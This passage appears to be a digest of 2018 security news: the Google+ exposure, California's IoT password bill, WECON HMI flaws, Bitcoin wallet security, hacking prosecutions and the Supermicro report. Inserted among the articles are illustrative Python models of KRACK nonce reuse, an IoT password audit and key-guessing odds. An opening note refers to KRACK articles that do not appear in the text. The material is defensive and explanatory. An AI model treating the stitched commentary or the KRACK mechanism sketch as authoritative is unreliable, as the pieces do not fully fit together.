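Both KRACK items on this page (the securityweek piece above and this one) describe the same mechanism: a retransmitted message 3 makes the client reinstall the PTK, which resets the packet number, so a nonce is used twice under the same key. The following Python model is an added illustration, not code from the paper or from any Wi-Fi stack; the SHA-256 keystream and the sample frames are constructed stand-ins for CCMP, and the hardened client's rule (never reinstall a PTK that is already installed, so the nonce counter is never reset) is a simplified form of the countermeasure the researchers discuss.

```python
from __future__ import annotations

import hashlib
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple


def keystream(key: bytes, nonce: int, length: int) -> bytes:
    """Stand-in for the CCMP/GCMP keystream: a deterministic function of
    (key, nonce). Reusing a (key, nonce) pair therefore reuses the keystream,
    which is exactly what a key reinstallation causes in real WPA2."""
    out = b""
    block = 0
    while len(out) < length:
        out += hashlib.sha256(
            key + nonce.to_bytes(6, "big") + block.to_bytes(4, "big")
        ).digest()
        block += 1
    return out[:length]


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


@dataclass
class Client:
    """Minimal supplicant state: the PTK, the transmit packet number (nonce),
    and whether a PTK has already been installed for this association."""
    hardened: bool
    ptk: Optional[bytes] = None
    tx_nonce: int = 0
    installed: bool = False
    sent: List[Tuple[int, bytes]] = field(default_factory=list)

    def handle_message3(self, ptk: bytes) -> str:
        # Vulnerable behaviour: every (re)transmitted message 3 reinstalls the
        # PTK, and installing a key resets the packet number to zero.
        # Hardened behaviour: once a PTK is installed, a retransmitted
        # message 3 is acknowledged but the key is not reinstalled, so the
        # nonce keeps counting up and is never reused.
        if self.installed and self.hardened:
            return "ignored-retransmission"
        self.ptk = ptk
        self.tx_nonce = 0
        self.installed = True
        return "installed"

    def send(self, plaintext: bytes) -> Tuple[int, bytes]:
        assert self.ptk is not None, "no key installed"
        ct = xor(plaintext, keystream(self.ptk, self.tx_nonce, len(plaintext)))
        frame = (self.tx_nonce, ct)
        self.sent.append(frame)
        self.tx_nonce += 1
        return frame


def nonces_reused(frames: List[Tuple[int, bytes]]) -> List[int]:
    """Receiver-side (or monitoring) check: under one PTK every packet number
    must be fresh. Returns the nonces seen more than once; an empty list
    means no reuse was observed."""
    seen, dup = set(), []
    for nonce, _ in frames:
        if nonce in seen and nonce not in dup:
            dup.append(nonce)
        seen.add(nonce)
    return dup


def run_scenario(hardened: bool) -> Dict[str, object]:
    """Replay the sequence the articles describe: message 3 arrives, the
    client sends a data frame, a retransmitted (or delayed) message 3
    arrives, the client sends another frame."""
    ptk = hashlib.sha256(b"constructed sample PTK").digest()  # constructed
    client = Client(hardened=hardened)
    results = [client.handle_message3(ptk)]
    pt_a = b"GET /login HTTP/1.1\r\n"   # constructed sample frames,
    pt_b = b"Cookie: session=abc\r\n"   # same length as pt_a
    _, ct_a = client.send(pt_a)
    results.append(client.handle_message3(ptk))  # retransmitted message 3
    _, ct_b = client.send(pt_b)
    # With the same (key, nonce) the keystreams cancel: XOR of the two
    # ciphertexts equals XOR of the two plaintexts, which is why nonce reuse
    # breaks confidentiality even though the key itself stays secret.
    return {
        "message3_results": results,
        "nonces": [n for n, _ in client.sent],
        "nonce_reused": bool(nonces_reused(client.sent)),
        "keystream_reused": xor(ct_a, ct_b) == xor(pt_a, pt_b),
    }


if __name__ == "__main__":
    for mode in (False, True):
        print("hardened" if mode else "vulnerable", run_scenario(mode))
```

The vulnerable client reports nonce 0 twice and keystream reuse; the hardened client reports nonces 0 and 1 and no reuse, which is also the property a monitoring check on packet numbers can verify.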


Project Strobe, what will change after the Google security breach?
10.10.2018 securityaffairs
Incident

Google announced a security breach that may have exposed data of over 500,000 users of its Google+ social network, these are the measures in response to the incident.
Yesterday Google announced a security breach that may have exposed data of over 500,000 users of its Google+ social network.

Security experts and privacy advocates criticized the company because it did not disclose the flaw in Google+ when it first discovered the issue in March, reportedly because it feared regulatory scrutiny and reputational damage.

Now, in order to prevent potential leakage of sensitive data to third-party app developers, the company has implemented significant changes to give users granular control over the data they share with each app.

Google has updated its Account Permissions system to allow users to grant individual permissions rather than a full set of permissions at once.


The company introduced several changes as a result of the work of Project Strobe, an internal task force charged with conducting a companywide audit of the company’s APIs in recent months.

The team reviewed third-party developers’ access to Google account and Android device data, and the IT giant has changed the way permissions are approved for Android apps to prevent the abuse and potential leakage of sensitive call and text log data by third-party developers.

While apps are only supposed to request the permissions they need to function properly, any Android app could ask for permission to access your phone and SMS data unnecessarily.

The new rule is part of the Google Play Developer Policy and aims to prevent abuse by restricting Call Log and SMS permissions to your “default” phone or SMS apps only.

“Some Android apps ask for permission to access a user’s phone (including call logs) and SMS data. Going forward, Google Play will limit which apps are allowed to ask for these permissions.” reads a blog post published by Google on Project Strobe.

“Only an app that you’ve selected as your default app for making calls or text messages will be able to make these requests. (There are some exceptions—e.g., voicemail and backup apps.)”

Google has also limited access to Gmail API only for apps expressly developed to improve/implement email features, including email clients and email backup services.

The measure aims at limiting APIs access to data from your Gmail email account.

What will happen from today?

Developers will have to update their applications to comply with the new policy by January 6th, 90 days from now.


Google Says Social Network Bug Exposed Private Data
9.10.2018 securityweek
Social

Google announced Monday it is shutting down the consumer version of its online social network after fixing a bug exposing private data in as many as 500,000 accounts.

The US internet giant said it will "sunset" the Google+ social network for consumers, which failed to gain meaningful traction after being launched in 2011 as a challenge to Facebook.

A Google spokesperson cited "significant challenges in creating and maintaining a successful Google+ that meets consumers' expectations" along with "very low usage" as the reasons for the move.

In March, a security audit revealed a software bug that gave third-party apps access to Google+ private profile data that people meant to share only with friends.

Google said it was unable to confirm which accounts were affected by the bug, but an analysis indicated it could have been as many as 500,000 Google+ accounts.

"We found no evidence that any developer was aware of this bug, or abusing the API, and we found no evidence that any profile data was misused," Google said in a blog post.

It was referring to application programming interface software for the social network.

The data involved was limited to optional profile fields, including name, age, gender, occupation and email address, Google said.

Information that could be accessed did not include posts, messages or telephone numbers, a spokesperson said.

Google did not specify how long the software flaw existed, or why it waited to disclose it.

The Wall Street Journal reported that Google executives opted against notifying users earlier because of concerns it would catch the attention of regulators and draw comparisons to a data privacy scandal at Facebook.

Earlier this year, Facebook acknowledged that tens of millions of users had personal data hijacked by Cambridge Analytica, a political firm working for Donald Trump in 2016.

"Every year, we send millions of notifications to users about privacy and security bugs and issues," a Google spokesman told AFP.

"Whenever user data may have been affected, we go beyond our legal requirements and apply several criteria focused on our users in determining whether to provide notice."

The company said it determined its course of action based on the data involved in the breach, lack of evidence of misuse and whether it could accurately determine which users to inform.


California to Ban Weak Passwords
9.10.2018 securityweek
Incident

California Bill Requires Unique Passwords in Connected Devices

The state of California recently passed a bill that requires the manufacturers of connected devices to use unique hardcoded passwords for each device manufactured.

The bill, meant to combat the widespread use of weak passwords in connected devices such as Internet of Things (IoT) products, also demands that manufacturers implement a security feature in their devices to require users to select new means of authentication upon first use.

The use of weak passwords in connected devices is a well-known security issue that has fueled a broad range of cyber-attacks, including the emergence of numerous, large IoT botnets.

By targeting devices improperly secured with default or easy-to-guess passwords, IoT botnets such as Mirai (and its many variants), Gafgyt (also known as Bashlite), Reaper, Hide 'N Seek, and Torii can then be leveraged to launch massive distributed denial of service attacks, to send spam emails, for malware distribution, and for various other nefarious activities.

However, it’s not only IoT devices that are impacted by the use of default or weak passwords. The issue was also found in industrial control system (ICS) products, and security researchers even published a list of default credentials for ICS devices.

Recently signed into law by California governor Jerry Brown, the new bill, SB-327, which is set to take effect on January 1, 2020, attempts to mitigate the problem by requiring the makers of connected devices to properly secure those products.

“This bill, beginning on January 1, 2020, would require a manufacturer of a connected device, as those terms are defined, to equip the device with a reasonable security feature or features that are appropriate to the nature and function of the device, appropriate to the information it may collect, contain, or transmit, and designed to protect the device and any information contained therein from unauthorized access, destruction, use, modification, or disclosure, as specified,” SB-327 reads.
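The bill text above leaves a manufacturer two routes: ship a password that is unique to each unit, or force the user to set a new credential before the device grants access for the first time. Below is an added example (not from the bill, SecurityWeek, or any vendor) of how a manufacturer's provisioning QA could audit a production batch against those two options. The record format, the short list of shared factory defaults, the 12-character house minimum and the sample batch are all constructed for illustration.

```python
"""Audit a batch of device provisioning records against the two credential
options described above.  Constructed example: record layout, default list,
length rule and sample data are assumptions, not taken from the bill."""
from collections import Counter
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed, illustrative set of factory defaults shared across many products.
SHARED_FACTORY_DEFAULTS = {"admin", "password", "12345", "1234", "root", ""}
MIN_PASSWORD_LEN = 12  # assumed house rule; the bill sets no length


@dataclass(frozen=True)
class DeviceRecord:
    serial: str
    preprogrammed_password: Optional[str]  # None when no credential is shipped
    force_change_on_first_use: bool        # option 2: new credential before first access


def audit_batch(records: List[DeviceRecord]) -> Dict[str, List[str]]:
    """Return {serial: findings}; an empty finding list means the unit complies."""
    # Count how many units in this batch share each shipped password, so a
    # "unique per device" claim can be checked across the whole batch.
    usage = Counter(r.preprogrammed_password for r in records
                    if r.preprogrammed_password is not None)
    report: Dict[str, List[str]] = {}
    for r in records:
        findings: List[str] = []
        pw = r.preprogrammed_password
        if r.force_change_on_first_use:
            # Option 2: the shipped value is only a bootstrap secret, but a
            # well-known default still lets anyone claim an unclaimed unit first.
            if pw in SHARED_FACTORY_DEFAULTS:
                findings.append("bootstrap password is a well-known factory default")
        else:
            # Option 1: the shipped password must be unique to this unit.
            if pw is None:
                findings.append("no password shipped and no forced change at first use")
            else:
                if pw in SHARED_FACTORY_DEFAULTS:
                    findings.append("shipped password is a well-known factory default")
                if usage[pw] > 1:
                    findings.append(f"shipped password shared by {usage[pw]} units in batch")
                if len(pw) < MIN_PASSWORD_LEN:
                    findings.append("shipped password shorter than house minimum")
        report[r.serial] = findings
    return report


# Constructed sample batch: two units sharing "admin", one unique password,
# one forced-change unit, one unit with neither protection.
SAMPLE_BATCH = [
    DeviceRecord("SN-0001", "admin", False),
    DeviceRecord("SN-0002", "admin", False),
    DeviceRecord("SN-0003", "kq7Lm2Zp9vXt4Rw8", False),
    DeviceRecord("SN-0004", "setup", True),
    DeviceRecord("SN-0005", None, False),
]


def sample_report() -> Dict[str, List[str]]:
    return audit_batch(SAMPLE_BATCH)


if __name__ == "__main__":
    for serial, findings in sample_report().items():
        print(serial, "OK" if not findings else "; ".join(findings))
```

The batch-wide duplicate count is the check most worth keeping: a password that looks strong in isolation still fails the "unique per device" option if the same string was burned into every unit of a production run.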

“There’s always more to do with information security, but sometimes targeted legislation addressing a specific problem can be effective,” Tim Erlin, VP, product management and strategy at Tripwire, told SecurityWeek in an emailed statement.

“Weak passwords are a problem, but this bill aims to address a more challenging and serious problem with poor default security in vendors’ products. It’s important that vendors see security as their responsibility, even after the customer takes possession of the product,” Erlin continued.

Ilia Kolochenko, CEO of security company High-Tech Bridge, also commented: “One should, however, keep in mind that banning weak passwords may also have a collateral effect. Some people will likely start using the same passwords everywhere, set long passwords and forget them, subsequently leaving the device without regular updates, or just invent passwords that will not fall under the legal definition of weak password but will remain easily brute-forceable. Nonetheless it’s still much better than inaction and ignorance.”


Code Execution Flaws Found in WECON Industrial Products
9.10.2018 securityweek
ICS

A significant number of vulnerabilities have been found recently in products from China-based WECON, but the vendor has been slow to release patches.

WECON specializes in human-machine interfaces (HMIs), programmable logic controllers (PLCs), and industrial PCs. The company's products are used all around the world, particularly in the critical manufacturing, energy, and water and wastewater sectors.

An advisory published recently by ICS-CERT reveals that researchers Mat Powell and Natnael Samson discovered several vulnerabilities in WECON's PI Studio HMI software. The list includes a critical stack-based buffer overflow that allows remote code execution, a high severity out-of-bounds write bug that also allows code execution, and two medium severity information disclosure flaws.

According to ICS-CERT, WECON has confirmed the vulnerabilities, but it has yet to release any patches.

ICS-CERT has this year published four advisories describing vulnerabilities in WECON products, including a medium severity flaw in the company's PLC Editor ladder logic software, and several high and medium severity bugs in LeviStudio applications.

All the vulnerabilities for which ICS-CERT has published advisories were reported by Samson, Powell and other researchers through Trend Micro's Zero Day Initiative (ZDI).

In fact, ZDI has already published 116 advisories in 2018 and over a dozen will be published in the upcoming period. However, it's worth noting that ZDI typically publishes multiple advisories for a single CVE as each advisory covers a variation of the same vulnerability.

On the other hand, many of the ICS-CERT advisories and a vast majority of the advisories from ZDI were published before patches were made available by the vendor.

A majority of the security holes allow remote code execution, but since they are related to how the affected applications handle certain file types, the attacker would need to convince the targeted user to open a specially crafted file in order to trigger the exploit.


How Secure Are Bitcoin Wallets, Really?
9.10.2018 securityaffairs
Security

Purchasers of Bitcoin wallets usually have one priority topping their lists: security. What’s the truth about the security of these wallets?
When buying a conventional wallet for coins and paper money, people often prioritize characteristics like the size, color, shape, and number of compartments.

However, purchasers of Bitcoin wallets — the software programs that facilitate storing someone’s cryptocurrency-related wealth — usually have one priority topping their lists: security.

So, the companies behind those wallets wisely emphasize why their products are more secure than what competitors offer and why that’s the case. But, beyond the marketing language, what’s the truth about the security of these wallets?

Guessing an Individual Bitcoin Wallet Key Is Tremendously Unlikely, Crypto Expert Says
People appreciate comparisons when thinking about the likelihood something might happen. Brian Liotti of the website Crypto Aquarium had that in mind when he carried out research and found the probability of guessing a Bitcoin key for one wallet is as likely as winning the Powerball nine times in a row.

So, that’s undoubtedly comforting to people who raise their eyebrows at the prospect of using a digital method to store their cryptocurrency investments.
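The Powerball comparison can be checked with the actual numbers. The following is an added example (not from the article or Crypto Aquarium) that solves for how many consecutive jackpot wins have the same combined odds as one correct guess of a 256-bit key, and estimates the expected brute-force time at an assumed guess rate. The Powerball odds of 1 in 292,201,338 and the 10^18 guesses per second figure are assumptions stated in the comments.

```python
"""Quantify the odds of guessing a single Bitcoin private key.
Added example; the Powerball odds and the guess rate are assumptions."""
import math

# A Bitcoin private key is a scalar on secp256k1 in the range 1..n-1, where n
# is only slightly below 2**256, so a 256-bit keyspace is an accurate size.
KEYSPACE_BITS = 256

# Assumed: Powerball jackpot odds of 1 in 292,201,338 (5 of 69 plus 1 of 26).
POWERBALL_ODDS = 292_201_338


def equivalent_powerball_wins(keyspace_bits: int = KEYSPACE_BITS,
                              odds: int = POWERBALL_ODDS) -> float:
    """Consecutive jackpot wins k whose combined odds equal one correct key
    guess: solve odds**k == 2**keyspace_bits for k."""
    return keyspace_bits * math.log(2) / math.log(odds)


def brute_force_years(keyspace_bits: int = KEYSPACE_BITS,
                      guesses_per_second: float = 1e18) -> float:
    """Expected years to hit one specific key at an assumed (very generous)
    rate; on average half the keyspace must be searched."""
    expected_guesses = 2 ** (keyspace_bits - 1)
    seconds = expected_guesses / guesses_per_second
    return seconds / (365.25 * 24 * 3600)


def probability_per_guess(keyspace_bits: int = KEYSPACE_BITS) -> float:
    """Chance that one uniformly random guess matches a given key."""
    return 2.0 ** -keyspace_bits


if __name__ == "__main__":
    print(f"one key guess ~= {equivalent_powerball_wins():.2f} Powerball jackpots in a row")
    print(f"expected brute-force time at 1e18 guesses/s: {brute_force_years():.2e} years")
    print(f"probability per guess: {probability_per_guess():.2e}")
```

The result lands at roughly nine consecutive jackpots, which agrees with the figure quoted above; the practical lesson is that key-guessing is not the threat model for a wallet, and the attack surface that matters is the device, firmware and recovery material discussed in the sections that follow.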

A Wallet Owner Gets Locked out for Months
There’s also the detailed account of Mark Frauenfelder, who owned a Trezor wallet and couldn’t access it for several traumatizing months after misplacing the PIN that served as recovery words for the software. His tale of woe proves a hacker couldn’t contact a Bitcoin wallet manufacturer, masquerade as a wallet owner and get the goods for access.

A Teenager Hacked a Tamper-Proof Wallet
Ledger, a French company that sells Bitcoin wallets, found itself receiving unwanted publicity when a British teenager disclosed a proof of concept that allowed him to break into the Ledger Nano S, a wallet the company had advertised as unhackable. The hack focuses on the device’s microcontrollers.

One of them stores the wallet’s private key and the other acts as a proxy. The proxy microcontroller is reportedly so insecure it cannot differentiate between authentic firmware and that which a cybercriminal creates.

This case study, as well as others associated with less-than-locked-down Bitcoin wallets, emphasizes how people should not get too comfortable after buying a Bitcoin wallet, even one considered as being among the best of the best. The same goes for storing other types of money: Following best practices is always the ideal approach.

If a person owns collector coins, it’s essential to learn how to protect them from potential sources of damage — such as temperature extremes, acids and humidity. Although they exist in the cyber-realm, Bitcoins need safeguards of their own concerning hackers, especially as even the most high-tech options show they need improvement.

Alleged Break-Ins to McAfee’s Wallet
The Bitfi Bitcoin wallet, backed by cybersecurity executive John McAfee, offered a $250,000 bounty to anyone who could successfully hack it. And, in August 2018, a security research firm called OverSoft NL claimed success. The company behind the wallet then issued a second bounty in an attempt to find the weaknesses.

People in the cybersecurity sector expressed their frustrations about the reward, since participants have to abide by the company’s rules. In other words, if cybersecurity experts hacked the wallet in a way the company didn’t specify, they would not win the reward.

But, hacks carried out by malicious players never seem to follow such parameters. Often, they involve unusual methods that exploit vulnerabilities the manufacturer never fathomed. Other people said they had hacked the wallet before OverSoft NL, but not per the company’s rules.

Even representatives from the cybersecurity firm expressed doubts that they’d actually receive the money, believing the bounty to be nothing more than a marketing ploy. The bounty program has since been discontinued, with the company promising to launch another soon.

The Marketing Language Could Tempt Hackers
Whenever something in the tech industry gets presented as impossible to infiltrate, both ethical and malicious hackers frequently see a challenge to try and prove otherwise.

As John McAfee spoke of his wallet on Twitter, the tone could easily come across as overconfident and cocky: “For all you naysayers who claim that ‘nothing is unhackable’ & who don’t believe that my Bitfi wallet is truly the world’s first unhackable device, a $100,000 bounty goes to anyone who can hack it…” And indeed, hackers got to work and accepted the challenge.

Cryptocurrency Wallet Owners Cannot Be Too Careful
Although we’ve seen here how research shows Bitcoin wallet hacks are unlikely and that a wallet owner himself couldn’t even get access to his funds after losing the PIN, case studies show hacks are still possible.

People should always perform adequate research about security measures built into individual wallets but also use them intelligently by following good cyber security habits and never assuming a wallet couldn’t get hacked.


WECON PI Studio HMI software affected by code execution flaws
9.10.2018 securityaffairs
ICS  Vulnerability

Security experts discovered several vulnerabilities in WECON’s PI Studio HMI software; the company has verified the issues but has not yet released patches.
Researchers Mat Powell and Natnael Samson discovered several vulnerabilities in WECON’s PI Studio HMI software, which is widely used in the critical manufacturing, energy, metallurgy, chemical, and water and wastewater sectors.

Both experts reported the flaws through Trend Micro’s Zero Day Initiative.

WECON specializes in human-machine interfaces (HMIs), programmable logic controllers (PLCs), and industrial PCs. The company’s products are used all around the world, particularly in the critical manufacturing, energy, and water and wastewater sectors.

The list of flaws discovered by the experts includes a critical stack-based buffer overflow vulnerability, tracked as CVE-2018-14818, that could lead to remote code execution.

Another flaw, tracked as CVE-2018-14810, is a high severity out-of-bounds write bug which may allow code to be executed in the context of an administrator.

The remaining issues are two medium severity information disclosure flaws tracked as CVE-2018-17889 and CVE-2018-14814.

“Successful exploitation of these vulnerabilities may allow remote code execution, execution of code in the context of an administrator, read past the end of an allocated object or allow an attacker to disclose sensitive information under the context of administrator.” reads the security advisory published by the ICS-CERT.

WECON has confirmed the vulnerabilities, but it has not revealed when it will release security patches.


Below is the list of mitigations provided by ICS-CERT:

“WECON has verified the vulnerabilities but has not yet released an updated version.” continues the security advisory.

“NCCIC recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. Specifically, users should:

Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.
Locate control system networks and remote devices behind firewalls, and isolate them from the business network.
When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.”


Google was aware of a flaw that exposed the data of over 500,000 Google Plus users, but did not disclose it
9.10.2018 securityaffairs
Social

This is very bad news for Google, which suffered a massive data breach that exposed the private data of over 500,000 Google Plus users to third-party developers.
As a consequence of the data exposure, the company is going to shut down the social media network Google+.

The root cause of the data breach is a security vulnerability affecting one of Google+ People APIs that allowed third-party developers to access data for more than 500,000 users.

Exposed data include usernames, email addresses, occupation, date of birth, profile photos, and gender-related information.

The worst aspect of the story is that the company did not disclose the flaw in Google+ when it first discovered the issue this spring because it feared regulatory scrutiny and reputational damage.

“Google exposed the private data of hundreds of thousands of users of the Google+ social network and then opted not to disclose the issue this past spring, in part because of fears that doing so would draw regulatory scrutiny and cause reputational damage, according to people briefed on the incident and documents reviewed by The Wall Street Journal.” reported the Wall Street Journal.

“As part of its response to the incident, the Alphabet Inc. unit on Monday announced a sweeping set of data privacy measures that include permanently shutting down all consumer functionality of Google+.”

Google declared that its experts immediately addressed this vulnerability in March 2018 and that they have found no evidence that any developer has exploited the flaw to access users’ data. The flaw had been present in the Google+ People APIs since 2015.

“We discovered and immediately patched this bug in March 2018. We believe it occurred after launch as a result of the API’s interaction with a subsequent Google+ code change.” reads a blog post published by Google.

“We made Google+ with privacy in mind and therefore keep this API’s log data for only two weeks. That means we cannot confirm which users were impacted by this bug. However, we ran a detailed analysis over the two weeks prior to patching the bug, and from that analysis, the Profiles of up to 500,000 Google+ accounts were potentially affected. Our analysis showed that up to 438 applications may have used this API.”


The choice of not disclosing the vulnerability was probably influenced by the Cambridge Analytica scandal that was occurring in the same period.

“A memo reviewed by the Journal prepared by Google’s legal and policy staff and shared with senior executives warned that disclosing the incident would likely trigger “immediate regulatory interest” and invite comparisons to Facebook’s leak of user information to data firm Cambridge Analytica.” continues the WSJ.

Experts believe that the vulnerability in Google+ is similar to the one recently discovered in Facebook’s API.

Google will maintain Google+ only for Enterprise users starting from August 2019.

Google also provided information about the Project Strobe program that has seen a privacy internal task force conducting a companywide audit of the company’s APIs in recent months.

“In a blog post on Monday, Google said it plans to clamp down on the data it provides outside developers through APIs. The company will stop letting most outside developers gain access to SMS messaging data, call log data and some forms of contact data on Android phones, and Gmail will only permit a small number of developers to continue building add-ons for the email service, the company said.” concludes the WSJ.
“The coming changes are evidence of a larger rethinking of data privacy at Google, which has in the past placed relatively few restrictions on how external apps access users’ data, provided those users give permission. Restricting access to APIs will hurt some developers who have been helping Google build a universe of useful apps.”


Silk Road Admin Pleads Guilty
8.10.2018 securityweek
Crime

An Irish man pled guilty in a United States court to his role in the administration of Silk Road, a black-market website.

The man, Gary Davis, 30, of Wicklow, Ireland, who went by the online handle of “Libertas,” was a member of the small administrative staff behind the Silk Road website. On Friday, he pled guilty to conspiring to distribute massive quantities of narcotics, a charge arising out of his admin role.

Silk Road, an online marketplace that operated between 2011 and 2013, was used by “thousands of drug dealers and other unlawful vendors to distribute illegal drugs and other illicit goods and services to more than 100,000 buyers,” the Department of Justice said in an announcement.

Owned by Ross William Ulbricht, also known as “Dread Pirate Roberts,” “DPR,” and “Silk Road,” the marketplace was also used to launder hundreds of millions of dollars derived from the unlawful transactions it hosted. Ulbricht was sentenced in 2015.

Silk Road, which was shut down in October 2013, was run by a small support staff that included both site administrators and forum moderators, documents presented in court claim.

The admins would monitor user activity, respond to customer service inquiries, and resolve issues between buyers and vendors. The forum moderators monitored user activity on discussion forums, provided guidance on how to conduct business on Silk Road, and reported significant problems to admins.

The court documents allege that Davis served as a forum moderator for Silk Road between May 2013 and June 2013 and that he then served as a site admin up to October 2, 2013.

His responsibilities included responding to customer support requests, resolving disputes that arose between drug dealers and buyers on the site, and enforcing the rules for doing business on Silk Road, which had been set by Ulbricht. Davis was reportedly paid a weekly salary for his work.

Davis was extradited to the United States four years after his arrest, prosecutors announced in July. On Friday, he pled guilty before United States District Judge Jesse M. Furman to one count of conspiracy to distribute narcotics.

Davis faces a maximum sentence of 20 years in prison. His sentencing has been scheduled for January 17, 2019.

“As he admitted today, Gary Davis served as an administrator who helped run the Silk Road marketplace. Davis’s arrest, extradition from Ireland, and conviction should send a clear message: the purported anonymity of the dark web is not a protective shield from prosecution,” Geoffrey S. Berman, the United States Attorney for the Southern District of New York, said.


Man Pleads Guilty to Hacking Websites of New York City Comptroller and West Point
8.10.2018 securityweek
BigBrothers

The United States Department of Justice (DoJ) this week announced that a California man has pleaded guilty to hacking the websites for the Combating Terrorism Center at the United States Military Academy in West Point, New York, and the Office of the New York City Comptroller.

The man, Billy Ribeiro Anderson, 41, of Torrance, California, also known as “Anderson Albuquerque” and “AlfabetoVirtual,” admitted to obtaining unauthorized access to the two websites and to defacing them by replacing publicly available contents of the website with hacker-generated content.

According to court documents, from 2015 through at least March 13, 2018, Anderson took responsibility for accessing various U.S. military, government, and business websites around the world, all without authorization.

Using the online handle of AlfabetoVirtual, he also committed more than 11,000 defacements of said websites, including websites for the Combating Terrorism Center at West Point and the NYC Comptroller.

The NYC Comptroller’s website was defaced on July 10, 2015. Anderson, who took responsibility for the incident, replaced the contents of the website to display the text “Hacked by AlfabetoVirtual,” “#FREEPALESTINE” and “#FREEGAZA.”

The hacker gained access to the website and was able to deface it by exploiting security vulnerabilities associated with the version of a plugin being used on the website.

Anderson defaced a website for the Combating Terrorism Center at West Point on October 4, 2016 and modified the site’s content to display the text “Hacked by AlfabetoVirtual.” He gained access to the site via an unauthorized administrative account that exploited a known cross-site scripting vulnerability, which allowed the hacker to bypass access controls.

Anderson also committed unauthorized intrusions into thousands of web servers worldwide through malicious code installed on the victim web servers. The code provided the hacker with administrative rights to the servers, which then enabled him to commit defacements and maintain a foothold on the compromised servers.

“The defendant pled guilty to two counts of computer fraud for causing damage to a protected computer, each of which carries a maximum sentence of 10 years in prison,” the DoJ announced. Anderson is scheduled for sentencing on February 13, 2019.


Russia's Hackers Long Tied to Military, Secret Services
8.10.2018 securityweek
BigBrothers

During the Soviet era, the country's top computer scientists and programmers largely worked for the secret services.

That practice appears to have resumed under President Vladimir Putin, as Russia faces accusations of waging a global campaign of cyber attacks.

Dutch officials on Thursday accused four Russians from the GRU military intelligence agency of attempting to hack into the global chemical weapons watchdog in The Hague.

The agency has investigated both the poisoning of Russian former double-agent Sergei Skripal and an alleged chemical attack by Moscow-allied Syrian President Bashar al-Assad.

The Baltic states were the first to accuse Moscow of mounting attacks to knock out their sites back in 2007.

Estonia said one such attack had put the country's main emergency service phone number out of action for over an hour.

Since then, accusations of cyber attacks have continued against Moscow.

The Russian hacker group variously known as Fancy Bear, APT 28 and Sofacy has been linked to GRU and accused of attacks on the US Democrats' 2016 presidential campaign, together with Russia's FSB security service, the successor to the KGB.

The skills of Russian hackers today developed from a tradition of excellent computing and programming skills dating back to the Soviet era.

"The whole structure of the economy was skewed towards the military sector," said Oleg Demidov, a consultant at the Moscow-based independent think-tank PIR Center.

"All the achievements of Soviet science including the first computers went to serve the military sector."

The most brilliant students were pushed to work in the military and space sector, he added.

- Banking crime -

After the Soviet Union fell apart in 1991, its armed forces were broken up and most of the top specialists turned to the nascent banking sector in Russia, either to work there or to attack it.

This era saw the first cyber attacks on banking operations and the first mentions of Russian hackers.

"Now Russian hackers are excellently trained and equipped and they still occupy one of the top positions in banking crime," said Demidov -- even if the Russian justice system has begun to crack down on them.

In 2016, Russian cybersecurity giant Kaspersky estimated that between 2012 and 2015, Russian hackers had stolen at least $790 million worldwide.

Russian computer scientists study at "very strong universities in Saint Petersburg, Moscow, Novosibirsk, Kazan or Krasnoyarsk", said Denis Kuskov of TelecomDaily specialised research agency.

They "can work anywhere in the world, in any international company," he added.

In recent years, however, more have opted to stay in Russia, he said. "The secret services have grown more interested in good programmers and it's easier for them to find work in Russia now."

In 2012, the Russian defence ministry announced it was creating its own "cyber troops". It launched a wide recruitment drive that included promotional videos on social media.

For Demidov, the growing wave of attacks attributed to Russian hackers has come about as Russia becomes better able to defend its own cyber security more strongly, the military sphere included.

"These efforts... have begun to bring results," he said.

Today however, even the most established players in Russian IT are in the sights of the West.

The US in 2017 imposed a ban on the use of Kaspersky's anti-virus software by federal agencies amid concerns about the company's links to the Russian intelligence services.

While many young Russians may choose to work for the military and secret services for reasons of patriotism, some may still be more interested by the money.

This week a military tribunal in Moscow held a closed-doors trial for the head of operational control at the FSB's centre for information security, Colonel Sergei Mikhalkov and three alleged accomplices.

Kommersant daily reported that they were accused of passing secrets on the Russian secret services' cyber technology to the FBI in return for $10 million.


UK, US Security Agencies Deny Investigating Chinese Spy Chips
8.10.2018 securityweek
BigBrothers

The U.S. Department of Homeland Security (DHS) and the U.K. National Cyber Security Centre (NCSC) have denied investigating the presence of Chinese spy chips in Supermicro servers, as claimed by a bombshell report published last week by Bloomberg.

According to Bloomberg, the Chinese government planted tiny chips in Supermicro motherboards in an effort to spy on more than 30 organizations in the United States, including government agencies and tech giants such as Apple and Amazon.

The report, on which Bloomberg reporters have been working for the past year using information from 17 sources, claims that Chinese agents masquerading as government or Super Micro employees pressured or bribed managers at the Chinese factories where the motherboards are built. Once the chips were planted, they would allow attackers to remotely access the compromised devices.

Apple and Amazon allegedly discovered the malicious hardware implants and contacted the FBI.

While many experts agree that it is technically possible to create and plant spy chips such as the one described, Apple, Amazon and Super Micro have strongly denied the reports, and their statements have now been backed by the DHS and the NCSC.

“We are aware of the media reports but at this stage have no reason to doubt the detailed assessments made by AWS and Apple,” stated the NCSC. “The NCSC engages confidentially with security researchers and urges anybody with credible intelligence about these reports to contact us.”

The DHS also published a statement on Saturday saying it's aware of the media reports.

“Like our partners in the UK, the National Cyber Security Centre, at this time we have no reason to doubt the statements from the companies named in the story,” the agency stated. “Information and communications technology supply chain security is core to DHS’s cybersecurity mission and we are committed to the security and integrity of the technology on which Americans and others around the world increasingly rely.”

No one has been able to independently confirm that the FBI has launched an investigation as a result of the discovery of spy chips, and a former Apple executive said the agency's representatives told him that they had never heard of this type of investigation.

Apple, Amazon and Super Micro were contacted by Bloomberg several times while the article was being written, but they are not happy with the final result. While it's not uncommon for major companies to deny news reports, the statements issued by the tech giants named in the Bloomberg story stand out because they are very detailed and attempt to show that the article is factually inaccurate.

“At no time, past or present, have we ever found any issues relating to modified hardware or malicious chips in SuperMicro motherboards in any Elemental or Amazon systems. Nor have we engaged in an investigation with the government,” Amazon said. “There are so many inaccuracies in ‎this article as it relates to Amazon that they’re hard to count.”

Apple claims it's disappointed that Bloomberg reporters have not been open to the possibility that their sources might be misinformed or wrong.

